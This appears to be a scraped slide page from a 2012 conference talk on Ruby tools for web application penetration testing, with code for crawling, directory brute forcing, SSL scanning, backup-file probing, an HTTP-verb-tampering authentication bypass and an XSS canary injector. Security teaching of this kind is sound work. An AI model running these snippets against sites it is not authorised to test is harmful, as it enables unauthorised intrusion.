CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 

Recently uploaded (20)

Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 

Picking gem ruby for penetration testers

  • 1. picks and gems: ruby for penetration @thesp0nge
  • 3. Why ruby? • API • networking • string manipulation • Net::HTTP • Coolness 3
  • 4. Disclaimer Attack only sites you’re authorized to 4
  • 5. What to test? class Developer class Developer # a bunch of great include # methods here Person::Attacker end # a plenty of great # methods here end Change your mindset. You’re an attacker now! 5
  • 6. What to test? Your app is a black box You must class Developer gather informations include about it Person::Attacker # a plenty of great You don’t have # methods here credentials end Ooh look... a web form... RubyDay IT, Milan, 15 June 6 2012
  • 7. Leverage your attack surface “It’s my web application. I don’t even promote it. I have all the informations about it, what are you talking about?” Deep knowledge of the underlying technology Spot attack entrypoints Check transport layer security Check for the service door RubyDay IT, Milan, 15 June 7 2012
  • 8. Leverage your attack surface robots.t to discover xt to fingerprint RubyDay IT, Milan, 15 June 8 2012
  • 9. Leverage your attack surface $ gem install links $ links -r http://www.yourtarget.com # TESTING: SPIDERS, ROBOTS, AND CRAWLERS (OWASP-IG-001) def self.robots(site, only_disallow=true) if (! site.start_with? 'http://') and (! site.start_with? 'https://') site = 'http://'+site end list = [] begin res=Net::HTTP.get_response(URI(site+'/robots.txt')) if (res.code != "200") return [] end “Just a bunch of ruby loc res.body.split("n").each do |line| away...” if only_disallow if (line.downcase.start_with?('disallow')) list << line.split(":")[1].strip.chomp end else if (line.downcase.start_with?('allow') or line.downcase.start_with?('disallow')) list << line.split(":")[1].strip.chomp end end end rescue return [] end list end RubyDay IT, Milan, 15 June 9 2012
  • 11. • Search engines crawl your site they are polite, you can ask not to do it • Attackers crawl your site... they are not polite. $ gem install anemone require 'anemone' Anemone.crawl("http://www.target.com/") do |anemone| anemone.on_every_page do |page| puts page.url end end 11 event name
  • 13. Build a transparent Sometimes you need to observe the requests your browser makes while using a website... async calls are so sweets... $ gem install casper Useful to check $ casper javascripts or urls called on going... while manual browsing your target site RubyDay IT, Milan, 15 June 13 2012
  • 14. Build a transparent module Casper class Proxy < WEBrick::HTTPProxyServer attr_reader :req_count attr_reader :hosts Extending def initialize(config={}) @req_count = 0 @hosts=[] WEBRick config[:Port] ||= 8080 config[:AccessLog] = [] config[:ProxyContentHandler] = Proc.new do |req, res| log_requests(req, res) end super(config) end private def log_requests(req, res) $stdout.puts "[#{Time.now}] #{req.request_line.chomp}n" if @hosts.index(req.host).nil? @hosts << req.host end Make the business inc_req_count end def inc_req_count @req_count += 1 end RubyDay IT, Milan, 15 June 14 2012
  • 16. enchant: brute force discovery Very intrusive attack... discover web directories using brute force. You’ll be busted $ gem install enchant $ enchant http://www.yourtarget.com RubyDay IT, Milan, 15 June 16 2012
  • 18. Web Application fingerpring Web servers answer to the same HTTP request in different way. GET / HTTP/1.0 HTTP/1.1 200 OK Date: Sun, 15 Jun 2003 17:10: 49 GMT HTTP/1.1 200 OK Server: Apache/1.3.23 Server: Microsoft-IIS/5.0 Last-Modified: Thu, 27 Feb 2003 03:48: 19 GMT Content-Location: http://iis.example.com/Default.htm ETag: 32417-c4-3e5d8a83 Date: Fri, 01 Jan 1999 20:13: 52 GMT Accept-Ranges: bytes Content-Type: text/HTML Content-Length: 196 Accept-Ranges: bytes Connection: close Last-Modified: Fri, 01 Jan 1999 20:13: 52 GMT Content-Type: text/HTML ETag: W/e0d362a4c335be1: ae1 Content-Length: 133 http://code.google.com/p/ webapplicationfingerprinter/ RubyDay IT, Milan, 15 June 18 2012
  • 19. SSL Testing Evaluate an SSL connection for: • protocols the server supports • cipher length • certificate key length $ gem install ciphersurfer $ ciphersurfer www.gmail.com Evaluating secure communication with www.gmail.com:443 Overall evaluation : B (76.5) Protocol support : ooooooooooooooooooooooooooooooooooooooooooooooooooooooo (55) Key exchange : oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo (80) Cipher strength : oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo (90) RubyDay IT, Milan, 15 June 19 2012
  • 20. SSL Testing protocol_version.each do |version| s = Ciphersurfer::Scanner.new({:host=>host, :port=>port, :proto=>version}) s.go if (s.ok_ciphers.size != 0) supported_protocols << version cipher_bits = cipher_bits | s.ok_bits def go ciphers = ciphers | s.ok_ciphers context=OpenSSL::SSL::SSLContext.new(@proto) end cipher_set = context.ciphers cipher_set.each do |cipher_name, cipher_version, bits, algorithm_bits| end request = Net::HTTP.new(@host, @port) request.use_ssl = true request.verify_mode = OpenSSL::SSL::VERIFY_NONE request.ciphers= cipher_name begin response = request.get("/") @ok_bits << bits @ok_ciphers << cipher_name rescue OpenSSL::SSL::SSLError => e # Quietly discard SSLErrors, really I don't care if the cipher has # not been accepted rescue # Quietly discard all other errors... you must perform all error # chekcs in the calling program end end end RubyDay IT, Milan, 15 June 20 2012
  • 22. Check for backup Crawl the web site and append file extension to your GETs require 'anemone' require 'httpclient' h=HTTPClient.new() Anemone.crawl(ARGV[0]) do |anemone| anemone.on_every_page do |page| response = h.get(page.url) puts "Original: #{page.url}: #{response.code}" response = h.get(page.url.to_s.split(";")[0].concat(".bak")) puts "BAK: #{page.url.to_s.split(";")[0].concat(".bak")}: #{response.code}" response = h.get(page.url.to_s.split(";")[0].concat(".old")) puts "OLD: #{page.url.to_s.split(";")[0].concat(".old")}: #{response.code}" response = h.get(page.url.to_s.split(";")[0].concat("~")) puts "~: #{page.url.to_s.split(";")[0].concat("~")}: #{response.code}" end end RubyDay IT, Milan, 15 June 22 2012
  • 24. Bypass A case study for a PHP 5.3 application using basic auth: with a tampered HTTP verb you can access to protected urls require 'net/http' Create a custom HTTP class Dammi < Net::HTTPRequest METHOD="DAMMI" verb REQUEST_HAS_BODY = false RESPONSE_HAS_BODY = true end http=Net::HTTP.new('www.mytarget.nonexistent', 80) r_a = http.request(Dammi.new("/backend/index.php")) Make the request puts r_a.body RubyDay IT, Milan, 15 June 24 2012
  • 25. Cross site scripting Executing arbitrary javascript code at client site by submitting a crafted parameter on a web form RubyDay IT, Milan, 15 June 25 2012
  • 26. Cross site scripting $ gem install cross $ cross http://www.yourtarget.com module Cross # Engine is the cross class using Mechanize to inject canary and check for # output class Engine include Singleton attr_reader :agent # Starts the engine def start @agent = Mechanize.new {|a| a.log = Logger.new("cross.log")} @agent.user_agent_alias = 'Mac Safari' end def inject(url) found = false page = @agent.get(url) page.forms.each do |f| f.fields.each do |ff| ff.value = "<script>alert('cross canary');</script>" end pp = @agent.submit(f) scripts = pp.search("//script") scripts.each do |sc| if sc.children.text == "alert('cross canary');" found = true end end end found end end end RubyDay IT, Milan, 15 June 26 2012
  • 27. Cross site scripting #!/usr/bin/env ruby $LOAD_PATH.unshift(File.expand_path(File.dirname(__FILE__) + '/../lib')) require 'mechanize' require 'ap' require 'logger' require 'cross' host = Cross::Host.new(ARGV[0]) ap "cross " + Cross::Version.version[:string] + " (C) 2011 - thesp0nge" ap "target: " + host.host engine = Cross::Engine.instance engine.start if engine.inject(ARGV[0]) ap "Canary found in output page. Suspected XSS" end It doesn’t work with iframe apps :-( RubyDay IT, Milan, 15 June 27 2012
  • 29. What we learnt • Don’t trust your users • “Security through obscurity” is EVIL • Testing for security issues is a mandatory step before deploy • HTTPS won’t safe from XSS or SQL Injections 29
  • 30. Some links before we http://armoredcode.com/blog/categories/pentest- with-ruby/ https://gist.github.com/2935464 for anemone crawling demo) (gist https://github.com/thesp0nge/links https://github.com/thesp0nge/ ciphersurfer https://github.com/thesp0nge/enchant https://github.com/thesp0nge/cross http://www.owasp.org http://ronin-ruby.github.com/ https://github.com/rapid7/metasploit-framework RubyDay IT, Milan, 15 June 30 2012
  • 31. Questions? 31 event name
  • 32. Thank you! 32 event name

Editor's Notes

  1. \n
  2. \n
  3. Why choosing ruby? Mainly because for its great networking API supporting HTTP natively and having a powerful regular expression engine (&gt;= 1.9). Yeah, it is cool too.\n\n
  4. DISCLAIMER\n
  5. Change your mindset\n
  6. A small recap on application security. Focus will be on discovery, information gathering, ssl, xss and sql injections\n
  7. Leverage your attack surface... what to look for?\n
  8. robots.txt\n
  9. robots.txt\n
  10. links -r http://www.corriere.it\n
  11. Crawling a website\n
  12. ruby crawl.rb -1 http://localhost:8080/\n
  13. Browsing with a transparent proxy\n
  14. casper code highlight\n
  15. ruby -I lib bin/casper &quot;&quot; 8008\n
  16. bruteforcing using enchant\n
  17. ruby -I lib bin/enchant localhost:8080 \n
  18. wapf... fingerprint using MD5 applied to static file common to frameworks\n
  19. ciphersurfer and SSL Testing\n
  20. ciphersurfer highlight\n
  21. ruby -I lib bin/ciphersurfer www.facebook.com\n
  22. The important to check for backup files\n
  23. ruby crawl.rb -2 http://localhost:8080/\n
  24. Bypassing auth for old written PHP app protected with basic auth and with poor configuration\n
  25. What XSS is\n
  26. cross code highlight\n
  27. again cross highlight\n
  28. ruby -I lib bin/cross &quot;http://localhost:8080/examples/xss_me.jsp&quot;\n
  29. what we learnt\n
  30. links\n
  31. \n
  32. \n